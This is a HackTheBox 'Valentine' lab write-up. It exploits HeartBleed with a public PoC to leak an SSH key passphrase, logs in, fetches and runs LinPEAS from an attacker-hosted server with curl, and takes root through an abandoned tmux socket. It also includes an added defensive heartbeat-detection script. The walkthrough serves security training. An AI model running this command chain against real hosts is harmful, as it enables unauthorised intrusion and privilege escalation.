Exploiting HeartBleed | Valentine HackTheBox
A HackTheBox machine centered around the HeartBleed vulnerability and privilege escalation through Linux capabilities.
Valentine | Linux
Difficulty: Medium
Tags: HeartBleed, memory leak, base64 decoding, privesc, tmux
Tools Used: Nmap, Gobuster, Searchsploit, Python, CyberChef, SSH, LinPEAS
Valentine isn’t about obscure exploits or edge-case kernel abuse. It’s about fundamentals. Memory leaks. Leaked secrets. Enumeration discipline. You’ll weaponize HeartBleed, decode exposed data, pivot into a user shell, and pull root through an abandoned tmux session. If you’ve ever underestimated OpenSSL bugs, this box will remind you why they matter.
Initial Enumeration
First step: scan for low-hanging fruit.
nmap -sC -sV -oN init-scan --script vuln 10.129.1.190
Results:
22/tcp open ssh OpenSSH 5.9p1
80/tcp open http Apache 2.2.22
443/tcp open https Apache 2.2.22 (SSL)
Nmap’s vuln script flagged HeartBleed on port 443:
State: VULNERABLE
Risk factor: High
Affected: OpenSSL 1.0.1 and 1.0.2-beta
This is the core of the box. No need for brute force. Just precision exploitation.
Web Enumeration
Took a quick pass over HTTP with Gobuster:
gobuster dir --url http://10.129.1.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o init-gob
Findings:
/dev/
/dev/hype_key
Visiting /dev/hype_key returned a hex-encoded blob.
Piped it into CyberChef: hex decoding first yielded a Base64 string. Decoding that revealed what looked like an encrypted RSA private key.
Saved it locally as hype_rsa and noted that we might need a passphrase.
HeartBleed Exploitation
Searched for a weaponized exploit:
searchsploit heartbleed
Picked Python PoC: 32764.py — a solid script for pulling memory leaks.
python 32764.py 10.129.1.190
Output included a juicy Base64 string:
aGVhcnRibGVlZGJlbGlldmVoeXBlCg==
Decoded:
heartbleedbelievehype
That smelled like an SSH key passphrase.
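The leak works because a vulnerable OpenSSL trusts the length field inside the heartbeat message; the patched code discards any heartbeat whose claimed payload does not fit in the record that carried it. As an added example (not part of the original write-up or of 32764.py), this Python code applies that bounds check to cleartext TLS records, the same test a network signature for HeartBleed probes relies on. The function names and the sample bytes are constructed for illustration.

```python
import struct

HEARTBEAT = 0x18   # TLS record ContentType 24 (RFC 6520)
MIN_PADDING = 16   # RFC 6520 requires at least 16 padding bytes

def iter_records(stream: bytes):
    """Yield (content_type, fragment) for each complete TLS record in stream."""
    off = 0
    while off + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, off)
        fragment = stream[off + 5: off + 5 + length]
        if len(fragment) < length:   # truncated capture, stop parsing
            return
        yield ctype, fragment
        off += 5 + length

def check_heartbeat(fragment: bytes):
    """Return None for a well-formed heartbeat, else the reason it is rejected."""
    if len(fragment) < 3:
        return "shorter than the 3-byte heartbeat header"
    _hb_type, claimed = struct.unpack_from("!BH", fragment, 0)
    # type(1) + payload_length(2) + payload + padding must fit in the record.
    if 1 + 2 + claimed + MIN_PADDING > len(fragment):
        return f"claims {claimed} payload bytes, record carries {len(fragment)}"
    return None

def scan(stream: bytes):
    """Return [(record_index, reason)] for every malformed cleartext heartbeat."""
    findings = []
    for index, (ctype, fragment) in enumerate(iter_records(stream)):
        if ctype == HEARTBEAT:
            reason = check_heartbeat(fragment)
            if reason:
                findings.append((index, reason))
    return findings

# Constructed sample capture (not taken from the box): one handshake record,
# one well-formed heartbeat, one heartbeat whose length field overstates it.
HANDSHAKE = bytes.fromhex("16030200040e000000")
GOOD_HB = bytes.fromhex("1803020017") + b"\x01\x00\x04ping" + b"\x00" * 16
BAD_HB = bytes.fromhex("1803020003") + b"\x01\x40\x00"
SAMPLE = HANDSHAKE + GOOD_HB + BAD_HB

if __name__ == "__main__":
    for index, reason in scan(SAMPLE):
        print(f"record {index}: malformed heartbeat, {reason}")
```

Heartbeats sent after the handshake completes are encrypted, so this check only sees probes sent in the clear; for encrypted sessions, compare heartbeat request and response record sizes instead.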
SSH Access & User Flag
Armed with the decoded key and passphrase, we tried:
chmod 600 hype_rsa
ssh hype@10.129.1.190 -i hype_rsa
Success.
Landed a shell as hype. Grabbed the user flag:
cat ~/user.txt
Privilege Escalation with LinPEAS
Uploaded linpeas.sh:
python3 -m http.server 5555 # on attacker machine
curl http://10.10.15.75:5555/linpeas.sh -o /tmp/linpeas.sh # on the target
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh
LinPEAS flagged an active root tmux socket:
/usr/bin/tmux -S /.devs/dev_sess
This was the escalation vector.
Root Access via Tmux
Attached to the tmux session:
/usr/bin/tmux -S /.devs/dev_sess attach
Root shell.
Final flag:
whoami
root
cat /root/root.txt
Summary / Review
This one was elegant:
HeartBleed → extracted memory contents
RSA key + passphrase from leaked data
SSH login with key
LinPEAS finds root socket
Tmux hijack gives root shell
Valentine is a showcase of classic flaws chained together for full compromise. No buffer overflows. No complex binaries. Just bad secrets management and forgotten sessions.
Command Recap
nmap -sC -sV -oN init-scan --script vuln 10.129.1.190
gobuster dir --url http://10.129.1.190 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Visit /dev/hype_key and decode blob using CyberChef
python 32764.py 10.129.1.190
# Decode base64 → "heartbleedbelievehype"
chmod 600 hype_rsa
ssh hype@10.129.1.190 -i hype_rsa
python3 -m http.server 5555
curl http://10.10.15.75:5555/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
/usr/bin/tmux -S /.devs/dev_sess attach
cat /root/root.txt
Final Thoughts
Memory leaks. Leaked secrets. Forgotten sessions.
Valentine shows how vulnerabilities don’t have to be complex to be critical. Sometimes it only takes one bug… and one missed cleanup.
Rooted with love. 💘
On to the next.